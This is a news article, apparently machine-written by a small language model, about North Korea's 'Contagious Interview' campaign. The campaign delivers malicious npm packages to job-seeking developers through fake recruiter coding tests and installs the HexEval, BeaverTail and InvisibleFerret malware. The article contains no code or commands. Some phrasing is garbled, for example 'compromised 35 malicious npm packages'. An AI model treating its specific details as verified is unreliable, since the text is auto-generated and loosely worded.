Ethical Hacking News
In a sophisticated supply chain attack, North Korean hackers have compromised 35 malicious npm packages that were downloaded over 4,000 times. The attack targets developers with an interview pretext, using social engineering tactics and malware loaders to gain execution on infected systems. This is part of the ongoing Contagious Interview campaign, which aims to conduct cryptocurrency and data theft.
A North Korea-linked supply chain attack has targeted developers with 35 malicious npm packages. The attack, known as Contagious Interview, aims to obtain unauthorized access to developer systems for cryptocurrency and data theft. Attackers pose as recruiters on LinkedIn, sending job seekers coding assignments that embed malicious npm packages. The malicious payload includes a hex-encoded loader and a JavaScript stealer called BeaverTail, which collects sensitive data. The attack employs social engineering tactics, including scripting outreach messages and convincing job descriptions. The threat actors are evolving their tradecraft to blend malware staging, OSINT-driven targeting, and social engineering to compromise developers.
North Korea-linked Supply Chain Attack Targets Developers with 35 Malicious npm Packages
The world of cybersecurity has witnessed numerous supply chain attacks in recent years, but one that stands out is the latest campaign undertaken by North Korean state-sponsored threat actors. According to a report by Socket, a group of malicious npm packages have been identified, which collectively downloaded over 4,000 times and were uploaded from 24 npm accounts. This campaign is part of an ongoing supply chain attack known as Contagious Interview, which aims to obtain unauthorized access to developer systems in order to conduct cryptocurrency and data theft.
The attack involves the attackers posing as recruiters on LinkedIn, sending job seekers and developers coding assignments by sharing a link to a malicious project hosted on GitHub or Bitbucket. These projects embed the malicious npm packages within them, making it challenging for developers to detect the presence of malware. The threat actors exploit the trust that job-seekers typically place in recruiters, initiating contact with scripted outreach messages and convincing job descriptions.
Upon receiving these assignments, victims are coaxed into cloning and running the projects outside containerized environments during the purported interview process. This is where the malicious payload is deployed, which includes a hex-encoded loader dubbed HexEval. Once installed, this loader collects host information post installation and selectively delivers a follow-on payload that's responsible for delivering a known JavaScript stealer called BeaverTail.
BeaverTail, in turn, is configured to download and execute a Python backdoor called InvisibleFerret, enabling the threat actors to collect sensitive data and establish remote control of infected hosts. The nesting-doll structure of this attack helps evade basic static scanners and manual reviews. Moreover, one npm alias also shipped a cross-platform keylogger package that captures every keystroke, demonstrating the threat actors' readiness to tailor payloads for deeper surveillance when the target warrants it.
The Contagious Interview operation is tracked under various monikers, including CL-STA-0240, DeceptiveDevelopment, DEV#POPPER, Famous Chollima, Gwisin Gang, Tenacious Pungsan, UNC5342, and Void Dokkaebi. Recent iterations of the campaign have taken advantage of social engineering tactics such as ClickFix to deliver malware like GolangGhost and PylangGhost. This sub-cluster of activity has been designated the name ClickFake Interview.
The latest findings from Socket point to a multi-pronged approach where Pyongyang threat actors are employing various methods to trick prospective targets into installing malware under the pretext of an interview or a Zoom meeting. This attack highlights an evolving tradecraft in North Korean supply chain attacks, one that blends malware staging, OSINT-driven targeting, and social engineering to compromise developers through trusted ecosystems.
"Their target software engineers who are actively job-hunting, exploiting the trust that job-seekers typically place in recruiters," said Socket researcher Kirill Boychenko. "Fake personas initiate contact, often with scripted outreach messages and convincing job descriptions."
By embedding malware loaders like HexEval in open source packages and delivering them through fake job assignments, threat actors sidestep perimeter defenses and gain execution on the systems of targeted developers. The campaign's multi-stage structure, minimal on-registry footprint, and attempt to evade containerized environments point to a well-resourced adversary refining its intrusion methods in real-time.
Related Information:
https://www.ethicalhackingnews.com/articles/North-Korean-Hackers-Embark-on-Sophisticated-Supply-Chain-Attack-Targeting-Developers-with-35-Malicious-npm-Packages-ehn.shtml
https://thehackernews.com/2025/06/north-korea-linked-supply-chain-attack.html
Published: Wed Jun 25 04:32:02 2025 by llama3.2 3B Q4_K_M
